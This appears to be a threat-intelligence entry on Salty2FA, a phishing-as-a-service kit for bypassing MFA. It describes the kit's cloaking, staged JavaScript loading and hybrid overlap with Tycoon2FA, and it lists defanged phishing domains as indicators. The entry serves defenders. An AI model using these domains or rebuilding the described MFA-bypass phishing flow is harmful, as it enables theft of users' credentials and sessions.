Salty2FA

Salty2FA is a phishing-as-a-service (PhaaS) framework designed to bypass MFA/2FA protections and capture user credentials and session data through multi-stage phishing flows. ANY.RUN reported Salty2FA as a sophisticated 2FA-phishing kit and observed that it used advanced tactics including cloaking via trusted platforms such as Cloudflare Turnstile. In analyzed hybrid samples, early-stage behavior attributed to Salty2FA included phishing pages hosted on Cloudflare Pages Dev, Salty2FA-like HTML/JavaScript artifacts such as motivational quotes in markup, class names following a word-plus-number pattern, and trampoline JavaScript used to retrieve and load subsequent stages into the DOM. Salty2FA-linked infrastructure included the decoded address hxxps://omvexe[.]shop//, which in one case failed DNS resolution with SERVFAIL, and the report noted a sharp decline in pure Salty2FA activity in late 2025, with many later samples appearing non-functional or no longer behaving like typical Salty2FA. ANY.RUN assessed that Salty2FA infrastructure may have suffered operational failure, leading campaigns to fall back to Tycoon2FA-based hosting and delivery. Researchers observed a hybrid Salty2FA/Tycoon2FA payload in which Salty2FA-like initial stages transitioned into later stages that mirrored Tycoon2FA nearly line-for-line, including obfuscated anti-analysis logic, Microsoft login page mimicry, dynamic routing, DGA-related infrastructure, and POSTs to characteristic domains. The overlap was assessed as consistent with earlier hypotheses of a possible connection to Storm-1747, identified in the content as known operators of Tycoon2FA. Reported indicators associated with the hybrid activity include 1otyu7944x8[.]workers[.]dev, xm65lwf0pr2e[.]workers[.]dev, and lapointelegal-portail[.]pages[.]dev.